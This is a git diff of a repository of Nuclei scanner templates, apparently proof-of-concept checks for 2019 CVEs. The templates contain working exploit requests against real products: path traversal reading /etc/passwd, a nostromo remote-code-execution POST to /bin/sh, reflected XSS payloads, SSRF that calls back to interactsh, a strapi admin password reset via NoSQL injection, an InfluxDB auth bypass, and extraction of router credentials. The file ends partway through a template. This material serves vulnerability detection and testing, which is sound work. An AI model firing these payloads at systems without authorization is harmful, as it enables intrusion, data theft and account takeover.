of the restricted directory on the remote server. + reference: + - https://www.exploit-db.com/exploits/47301 + - https://nvd.nist.gov/vuln/detail/CVE-2019-11013 + - https://mayaseven.com/nimble-directory-traversal-in-nimble-streamer-version-3-0-2-2-to-3-5-4-9/ + - http://packetstormsecurity.com/files/154196/Nimble-Streamer-3.x-Directory-Traversal.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2019-11013 + cwe-id: CWE-22 + tags: cve,cve2019,lfi,nimble requests: - method: GET diff --git a/poc/cve/cve-2019-12276.yaml b/poc/cve/cve-2019-12276.yaml index 855a1e73c9..f02854bc6b 100644 --- a/poc/cve/cve-2019-12276.yaml +++ b/poc/cve/cve-2019-12276.yaml @@ -8,12 +8,14 @@ info: reference: - https://security401.com/grandnode-path-traversal/ - https://www.cvedetails.com/cve/CVE-2019-12276 - tags: cve,cve2019,lfi + - https://grandnode.com + - https://github.com/grandnode/grandnode classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2019-12276 cwe-id: CWE-22 + tags: cve,cve2019,lfi requests: - method: GET diff --git a/poc/cve/cve-2019-12581.yaml b/poc/cve/cve-2019-12581.yaml new file mode 100644 index 0000000000..327f88b08f --- /dev/null +++ b/poc/cve/cve-2019-12581.yaml @@ -0,0 +1,55 @@ +id: CVE-2019-12581 + +info: + name: Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting + author: n-thumann + severity: medium + description: Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest firmware update provided by Zyxel to fix the XSS vulnerability. + reference: + - https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml + - https://sec-consult.com/vulnerability-lab/advisory/reflected-cross-site-scripting-in-zxel-zywall/ + - https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-12581 + - https://www.zyxel.com/us/en/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-12581 + cwe-id: CWE-79 + epss-score: 0.00642 + epss-percentile: 0.7705 + cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zyxel + product: uag2100_firmware + shodan-query: http.title:"ZyWall" + tags: cve,cve2019,zyxel,zywall,xss + +http: + - method: GET + path: + - "{{BaseURL}}/free_time_failed.cgi?err_msg=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "Please contact with administrator." + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 490a0046304402202bbcd24325d27b4afa9692a47676116c3e746dac9efb6781eca7200bedd46d5c02203e77b6aa27e9da81a381ac8a93047e7dfe379956ebf9a6b0196e58a7150cb1a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2019-12583.yaml b/poc/cve/cve-2019-12583.yaml index dea4b3429c..3f62ff75c8 100644 --- a/poc/cve/cve-2019-12583.yaml +++ b/poc/cve/cve-2019-12583.yaml @@ -5,19 +5,31 @@ info: author: n-thumann,daffainfo severity: critical description: Zyxel UAG, USG, and ZyWall devices allows a remote attacker to generate guest accounts by directly accessing the account generator via the "Free Time" component. This can lead to unauthorized network access or DoS attacks. + impact: | + An attacker can exploit this vulnerability to create unauthorized accounts with administrative privileges. + remediation: | + Apply the latest firmware update provided by Zyxel to fix the vulnerability. reference: - https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml - https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/ - https://nvd.nist.gov/vuln/detail/CVE-2019-12583 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/StarCrossPortal/scalpel classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H cvss-score: 9.1 cve-id: CVE-2019-12583 cwe-id: CWE-425 - tags: cve,cve2019,zyxel,zywall + epss-score: 0.00481 + epss-percentile: 0.75389 + cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zyxel + product: uag2100_firmware + tags: cve,cve2019,zyxel,zywall,xss - -requests: +http: - method: GET path: - "{{BaseURL}}/free_time.cgi" @@ -34,5 +46,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/06/01 +# digest: 4b0a00483046022100a12874f0ef2733bc8c7f0e764fb0ca6289dcb56f72499b238b27b09caf888bb8022100db48c204ba56cf97ad35c36b148a21decd86e83cd35614cb546190faea932e61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2019-15713.yaml b/poc/cve/cve-2019-15713.yaml new file mode 100644 index 0000000000..d05e3811c7 --- /dev/null +++ b/poc/cve/cve-2019-15713.yaml @@ -0,0 +1,40 @@ +id: CVE-2019-15713 + +info: + name: WordPress My Calendar <= 3.1.9 - Cross-Site Scripting + author: daffainfo,dhiyaneshDk + severity: medium + description: WordPress plugin My Calendar <= 3.1.9 is susceptible to reflected cross-site scripting which can be triggered via unescaped usage of URL parameters in multiple locations throughout the site. + reference: + - https://wpscan.com/vulnerability/9267 + - https://wordpress.org/plugins/my-calendar/#developers + - https://nvd.nist.gov/vuln/detail/CVE-2019-15713 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-15713 + cwe-id: CWE-79 + tags: cve,cve2019,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/21 diff --git a/poc/cve/cve-2019-16278.yaml b/poc/cve/cve-2019-16278.yaml index 6c393728a2..290be2f6cd 100644 --- a/poc/cve/cve-2019-16278.yaml +++ b/poc/cve/cve-2019-16278.yaml @@ -1,20 +1,27 @@ id: CVE-2019-16278 info: - author: pikpikcu name: nostromo 1.9.6 - Remote Code Execution + author: pikpikcu severity: critical - - # Source: https://www.exploit-db.com/raw/47837 + description: nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via directory traversal in the function http_verify. + reference: + - https://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.html + - https://www.exploit-db.com/raw/47837 + - https://nvd.nist.gov/vuln/detail/CVE-2019-16278 + - http://www.nazgul.ch/dev/nostromo_cl.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-16278 + cwe-id: CWE-22 + tags: cve,cve2019,rce requests: - raw: - | POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 - Content-Length: 1 - Connection: close echo echo @@ -23,4 +30,6 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0:" \ No newline at end of file + - "root:.*:0:0:" + +# Enhanced by mp on 2022/03/29 diff --git a/poc/cve/cve-2019-16313.yaml b/poc/cve/cve-2019-16313.yaml new file mode 100644 index 0000000000..13f6df33f6 --- /dev/null +++ b/poc/cve/cve-2019-16313.yaml @@ -0,0 +1,42 @@ +id: CVE-2019-16313 + +info: + name: ifw8 Router ROM v4.31 Credential Discovery + author: pikpikcu + severity: high + description: ifw8 Router ROM v4.31 is vulnerable to credential disclosure via action/usermanager.htm HTML source code. + reference: + - https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/CVE-2019-16313%20%E8%9C%82%E7%BD%91%E4%BA%92%E8%81%94%E4%BC%81%E4%B8%9A%E7%BA%A7%E8%B7%AF%E7%94%B1%E5%99%A8v4.31%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md + - https://nvd.nist.gov/vuln/detail/CVE-2019-16313 + - http://www.iwantacve.cn/index.php/archives/311/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-16313 + cwe-id: CWE-798 + tags: cve,cve2019,exposure,router,iot + +requests: + - method: GET + path: + - '{{BaseURL}}/action/usermanager.htm' + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - '\*\*\*\*\*\*<\/td>' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '\*\*\*\*\*\*<\/td>' + +# Enhanced by mp on 2022/03/30 diff --git a/poc/cve/cve-2019-16931.yaml b/poc/cve/cve-2019-16931.yaml index 92723cdf96..bb94876d8a 100644 --- a/poc/cve/cve-2019-16931.yaml +++ b/poc/cve/cve-2019-16931.yaml @@ -1,26 +1,38 @@ id: CVE-2019-16931 info: - name: Visualizer < 3.3.1 - Stored Cross-Site Scripting (XSS) + name: WordPress Visualizer <3.3.1 - Cross-Site Scripting author: ritikchaddha severity: medium description: | - By abusing a lack of access controls on the /wp-json/visualizer/v1/update-chart WP-JSON API endpoint, an attacker can arbitrarily modify meta data of an existing chart, and inject a XSS payload to be stored and later executed when an admin goes to edit the chart. + WordPress Visualizer plugin before 3.3.1 contains a stored cross-site scripting vulnerability via /wp-json/visualizer/v1/update-chart WP-JSON API endpoint. An unauthenticated attacker can execute arbitrary JavaScript when an admin or other privileged user edits the chart via the admin dashboard. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Update to the latest version of WordPress Visualizer plugin (3.3.1) or apply the provided patch to fix the XSS vulnerability. reference: - https://wpscan.com/vulnerability/867e000d-d2f5-4d53-89b0-41d7d4163f44 - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf - - https://nvd.nist.gov/vuln/detail/CVE-2019-16931 - https://wpvulndb.com/vulnerabilities/9893 + - https://nvd.nist.gov/vuln/detail/CVE-2019-16931 + - https://wordpress.org/plugins/visualizer/#developers classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-16931 cwe-id: CWE-79 + epss-score: 0.00244 + epss-percentile: 0.63842 + cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth + verified: true + max-request: 1 + vendor: themeisle + product: visualizer + framework: wordpress + tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth,wpscan,themeisle -requests: +http: - raw: - | POST /wp-json/visualizer/v1/update-chart HTTP/1.1 @@ -44,3 +56,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100b78e47211e9117540a361a7bbf61d48981be1df9f46a4082d26c40b81df38d6102200512ae445356bf97e4696e845580d7182fea7be874fd8a8faa74d11473c7cc31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2019-16932.yaml b/poc/cve/cve-2019-16932.yaml new file mode 100644 index 0000000000..096839afa5 --- /dev/null +++ b/poc/cve/cve-2019-16932.yaml @@ -0,0 +1,60 @@ +id: CVE-2019-16932 + +info: + name: Visualizer <3.3.1 - Blind Server-Side Request Forgery + author: akincibor + severity: critical + description: | + Visualizer prior to 3.3.1 suffers from a blind server-side request forgery vulnerability via the /wp-json/visualizer/v1/upload-data endpoint. + impact: | + An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or data leakage. + remediation: | + Update Visualizer plugin to version 3.3.1 or later to fix the SSRF vulnerability. + reference: + - https://wpscan.com/vulnerability/9892 + - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf + - https://nvd.nist.gov/vuln/detail/CVE-2019-16932 + - https://wordpress.org/plugins/visualizer/#developers + - https://wpvulndb.com/vulnerabilities/9892 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N + cvss-score: 10 + cve-id: CVE-2019-16932 + cwe-id: CWE-918 + epss-score: 0.53434 + epss-percentile: 0.97316 + cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: themeisle + product: visualizer + framework: wordpress + tags: cve,cve2019,wp-plugin,ssrf,wordpress,xss,unauth,wpscan,intrusive,themeisle + +http: + - method: POST + path: + - "{{BaseURL}}/wp-json/visualizer/v1/upload-data" + + body: '{\"url\":\"http://{{interactsh-url}}\"}' + + headers: + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: word + name: http + part: interactsh_protocol + words: + - http + + - type: word + part: header + words: + - application/json + + - type: status + status: + - 200 +# digest: 490a0046304402207989475e566a8c429d3ffb543eae9696bd0cd6ec52dd6126a0f10ca0df5380ba0220392172acb649aa5ecd64280b32ddf78e01a34d0a597bf1224d335bb8ecfa5445:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2019-17444.yaml b/poc/cve/cve-2019-17444.yaml index e02dbd7ffb..d7bb5dd6b7 100644 --- a/poc/cve/cve-2019-17444.yaml +++ b/poc/cve/cve-2019-17444.yaml @@ -1,18 +1,18 @@ id: CVE-2019-17444 info: + name: Jfrog Artifactory <6.17.0 - Default Admin Password author: pdteam - name: Jfrog Artifactory default password severity: critical description: | - Jfrog Artifactory uses default passwords (such as "password") for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory. This issue affects Jfrog Artifactory versions prior to 6.17.0. + Jfrog Artifactory prior to 6.17.0 uses default passwords (such as "password") for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory. reference: - https://www.jfrog.com/confluence/display/JFROG/Artifactory+Release+Notes - https://www.jfrog.com/confluence/display/JFROG/JFrog+Artifactory - https://nvd.nist.gov/vuln/detail/CVE-2019-17444 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2019-17444 cwe-id: CWE-521 tags: cve,cve2019,jfrog,default-login @@ -30,13 +30,14 @@ requests: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: - '"name":"admin"' - '"admin":true' - condition: and \ No newline at end of file + condition: and + + - type: status + status: + - 200 +# Enhanced by mp on 2022/05/16 diff --git a/poc/cve/cve-2019-18371.yaml b/poc/cve/cve-2019-18371.yaml new file mode 100644 index 0000000000..62b60facee --- /dev/null +++ b/poc/cve/cve-2019-18371.yaml @@ -0,0 +1,43 @@ +id: CVE-2019-18371 + +info: + name: Xiaomi Mi WiFi R3G Routers - Local file Inclusion + author: ritikchaddha + severity: high + description: | + Xiaomi Mi WiFi R3G devices before 2.28.23-stable are susceptible to local file inclusion vulnerabilities via a misconfigured NGINX alias, as demonstrated by api-third-party/download/extdisks../etc/config/account. With this vulnerability, the attacker can bypass authentication. + remediation: | + Update the firmware of the Xiaomi Mi WiFi R3G routers to the latest version, which includes a fix for the local file inclusion vulnerability. + reference: + - https://ultramangaia.github.io/blog/2019/Xiaomi-Series-Router-Command-Execution-Vulnerability.html + - https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/arbitrary_file_read_vulnerability.py + - https://nvd.nist.gov/vuln/detail/CVE-2019-18371 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-18371 + cwe-id: CWE-22 + epss-score: 0.02376 + epss-percentile: 0.88739 + cpe: cpe:2.3:o:mi:millet_router_3g_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: mi + product: millet_router_3g_firmware + tags: cve2019,cve,lfi,router,mi,xiaomi + +http: + - method: GET + path: + - "{{BaseURL}}/api-third-party/download/extdisks../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 +# digest: 4a0a0047304502202ceca95e0d23de7e0a57b502dd0f9cdbcb2ff6275f928581667d5d77e31bd462022100c5340466ae8dcfee1d77f4663912ab93da119436b3e23013e6b82fa1f43129ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2019-18394.yaml b/poc/cve/cve-2019-18394.yaml index 54d75bda8f..7edc1dc808 100644 --- a/poc/cve/cve-2019-18394.yaml +++ b/poc/cve/cve-2019-18394.yaml @@ -1,17 +1,30 @@ id: CVE-2019-18394 info: - name: Openfire Full Read SSRF - author: pdteam - nuclei.projectdiscovery.io + name: Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery + author: pdteam severity: critical - - # Source:- https://swarm.ptsecurity.com/openfire-admin-console/ + description: Ignite Realtime Openfire through version 4.4.2 allows attackers to send arbitrary HTTP GET requests in FaviconServlet.java, resulting in server-side request forgery. + reference: + - https://swarm.ptsecurity.com/openfire-admin-console/ + - https://github.com/igniterealtime/Openfire/pull/1497 + - https://nvd.nist.gov/vuln/detail/CVE-2019-18394 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-18394 + cwe-id: CWE-918 + tags: cve,cve2019,ssrf,openfire,oast requests: - method: GET path: - - "{{BaseURL}}/getFavicon?host=burpcollaborator.net" + - "{{BaseURL}}/getFavicon?host=http://{{interactsh-url}}" + matchers: - type: word + part: interactsh_protocol # Confirms the HTTP Interaction words: - -

Burp Collaborator Server

\ No newline at end of file + - "http" + +# Enhanced by mp on 2022/05/03 diff --git a/poc/cve/cve-2019-18818.yaml b/poc/cve/cve-2019-18818.yaml index 5ec5e8c48c..3e560d9c4b 100644 --- a/poc/cve/cve-2019-18818.yaml +++ b/poc/cve/cve-2019-18818.yaml @@ -1,17 +1,18 @@ id: CVE-2019-18818 info: - name: strapi CMS Unauthenticated Admin Password Reset + name: strapi CMS <3.0.0-beta.17.5 - Admin Password Reset author: idealphase severity: critical - description: "strapi CMS before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js." + description: strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js. reference: - https://github.com/advisories/GHSA-6xc2-mj39-q599 - https://www.exploit-db.com/exploits/50239 - https://nvd.nist.gov/vuln/detail/CVE-2019-18818 + - https://github.com/strapi/strapi/releases/tag/v3.0.0-beta.17.5 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2019-18818 cwe-id: CWE-640 tags: cve,cve2019,strapi,auth-bypass,intrusive @@ -23,7 +24,9 @@ requests: Host: {{Hostname}} Origin: {{BaseURL}} Content-Type: application/json + {"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"} + matchers-condition: and matchers: - type: status @@ -49,4 +52,5 @@ requests: - .user.username - .user.email -# Enhanced by mp on 2022/04/01 + +# Enhanced by mp on 2022/05/03 diff --git a/poc/cve/cve-2019-19824.yaml b/poc/cve/cve-2019-19824.yaml index 35562023ae..15cf1f3024 100644 --- a/poc/cve/cve-2019-19824.yaml +++ b/poc/cve/cve-2019-19824.yaml @@ -9,6 +9,7 @@ info: - https://sploit.tech/2019/12/16/Realtek-TOTOLINK.html - https://nvd.nist.gov/vuln/detail/CVE-2019-19824 - https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits + - https://sploit.tech classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 diff --git a/poc/cve/cve-2019-20085.yaml b/poc/cve/cve-2019-20085.yaml new file mode 100644 index 0000000000..eba6f7c080 --- /dev/null +++ b/poc/cve/cve-2019-20085.yaml @@ -0,0 +1,33 @@ +id: CVE-2019-20085 + +info: + name: TVT NVMS 1000 - Directory Traversal + author: daffainfo + severity: high + description: TVT NVMS-1000 devices allow GET /.. Directory Traversal + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-20085 + - https://www.exploit-db.com/exploits/48311 + - https://www.exploit-db.com/exploits/47774 + - http://packetstormsecurity.com/files/157196/TVT-NVMS-1000-Directory-Traversal.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-20085 + cwe-id: CWE-22 + tags: cve,cve2019,iot,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini" + + matchers-condition: and + matchers: + - type: regex + regex: + - "\\[(font|extension|file)s\\]" + part: body + - type: status + status: + - 200 diff --git a/poc/cve/cve-2019-20933.yaml b/poc/cve/cve-2019-20933.yaml index fbe3c4f008..8f2e603c54 100644 --- a/poc/cve/cve-2019-20933.yaml +++ b/poc/cve/cve-2019-20933.yaml @@ -1,39 +1,50 @@ -id: CVE-2019-20933 - +id: CVE-2019-20933 + info: - name: Authentication Bypass InfluxDB + name: InfluxDB <1.7.6 - Authentication Bypass author: pussycat0x,c-sh0 severity: critical - description: InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). + description: InfluxDB before 1.7.6 contains an authentication bypass vulnerability via the authenticate function in services/httpd/handler.go. A JWT token may have an empty SharedSecret (aka shared secret). An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can bypass authentication and gain unauthorized access to the InfluxDB database. + remediation: Update Influxdb to version 1.7.6~rc0-1 or higher. reference: - https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 - - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20933 - https://github.com/influxdata/influxdb/compare/v1.7.5...v1.7.6 - remediation: Update Influxdb to version 1.6.7~rc0-1 or higher. + - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 + - https://github.com/influxdata/influxdb/commit/761b557315ff9c1642cf3b0e5797cd3d983a24c0 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-20933 cwe-id: CWE-287 + epss-score: 0.04913 + epss-percentile: 0.92609 + cpe: cpe:2.3:a:influxdata:influxdb:*:*:*:*:*:*:*:* metadata: - shodan-dork: InfluxDB - verified: "true" - tags: unauth,db,influxdb,misconfig -requests: - - method: GET - path: - - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"results":' - - '"name":"databases"' - condition: and - - - type: status - status: - - 200 + verified: true + max-request: 1 + vendor: influxdata + product: influxdb + shodan-query: InfluxDB + tags: cve,cve2019,unauth,db,influxdb,misconfig,influxdata + +http: + - method: GET + path: + - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"results":' + - '"name":"databases"' + condition: and + + - type: status + status: + - 200 +# digest: 4b0a00483046022100b58799e6f8127779c0e815988ea4492ea6d8636cc9b2d9a0c8b6619e4d8d6078022100e896460a50bf9af6cc431831d64f1bdb58867e720e5cf1e203c1ef4431670286:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2019-2579.yaml b/poc/cve/cve-2019-2579.yaml index b8cc27c5e2..f54804eb17 100644 --- a/poc/cve/cve-2019-2579.yaml +++ b/poc/cve/cve-2019-2579.yaml @@ -1,19 +1,20 @@ id: CVE-2019-2579 info: - name: Oracle WebCenter Sites - SQL Injection + name: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection author: leovalcante severity: medium - description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data. + description: The Oracle WebCenter Sites component of Oracle Fusion Middleware 12.2.1.3.0 is susceptible to SQL injection via an easily exploitable vulnerability that allows low privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data. reference: - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites - https://github.com/Leovalcante/wcs_scanner - tags: cve,cve2019,oracle,wcs,sqli + - https://nvd.nist.gov/vuln/detail/CVE-2019-2579 + - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N - cvss-score: 4.30 + cvss-score: 4.3 cve-id: CVE-2019-2579 - + tags: cve,cve2019,oracle,wcs,sqli requests: - raw: @@ -48,4 +49,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/05/04 diff --git a/poc/cve/cve-2019-3799.yaml b/poc/cve/cve-2019-3799.yaml new file mode 100644 index 0000000000..167e2d5f81 --- /dev/null +++ b/poc/cve/cve-2019-3799.yaml @@ -0,0 +1,31 @@ +id: CVE-2019-3799 + +info: + name: Spring-Cloud-Config-Server Directory Traversal + author: madrobot + severity: medium + description: Spring Cloud Config, versions 2.1.x prior to 2.1.2, versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack. + reference: + - https://github.com/mpgn/CVE-2019-3799 + - https://pivotal.io/security/cve-2019-3799 + - https://www.oracle.com/security-alerts/cpuapr2022.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2019-3799 + cwe-id: CWE-22 + tags: cve,cve2019,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - 'root:.*:0:0:' + part: body diff --git a/poc/cve/cve-2019-3911.yaml b/poc/cve/cve-2019-3911.yaml new file mode 100644 index 0000000000..ba2a73a676 --- /dev/null +++ b/poc/cve/cve-2019-3911.yaml @@ -0,0 +1,40 @@ +id: CVE-2019-3911 + +info: + name: LabKey Server < 18.3.0 - XSS + author: princechaddha + severity: medium + description: Reflected cross-site scripting (XSS) vulnerability in LabKey Server Community Edition before 18.3.0-61806.763 allows an unauthenticated remote attacker to inject arbitrary javascript via the onerror + parameter in the /__r2/query endpoints. + reference: + - https://www.tenable.com/security/research/tra-2019-03 + - https://www.cvedetails.com/cve/CVE-2019-3911 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-3911 + cwe-id: CWE-79 + metadata: + shodan-query: 'Server: Labkey' + tags: cve,cve2019,xss,labkey + +requests: + - method: GET + path: + - '{{BaseURL}}/__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2019-5418.yaml b/poc/cve/cve-2019-5418.yaml new file mode 100644 index 0000000000..8313d1a869 --- /dev/null +++ b/poc/cve/cve-2019-5418.yaml @@ -0,0 +1,35 @@ +id: CVE-2019-5418 + +info: + name: Rails File Content Disclosure + author: omarkurt + severity: high + description: Rails <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 are susceptible to a file content disclosure vulnerability because specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed. + reference: + - https://github.com/omarkurt/CVE-2019-5418 + - https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-5418 + - https://www.exploit-db.com/exploits/46585/ + classification: + cvss-metrics: 